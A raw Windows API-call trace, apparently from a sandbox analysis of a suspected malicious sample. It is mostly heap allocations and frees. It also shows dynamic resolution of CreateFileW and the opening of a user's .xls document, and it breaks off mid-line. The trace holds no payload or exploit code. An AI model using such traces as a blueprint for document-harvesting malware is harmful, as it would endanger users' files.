RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0080.197] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0080.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0080.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0080.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0080.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0080.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0080.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.200] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0080.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0080.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a48c0 [0080.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0080.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.203] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0080.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0080.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.206] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0080.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0080.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.206] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0080.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\vmdyvxc3ol-gmt2m.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 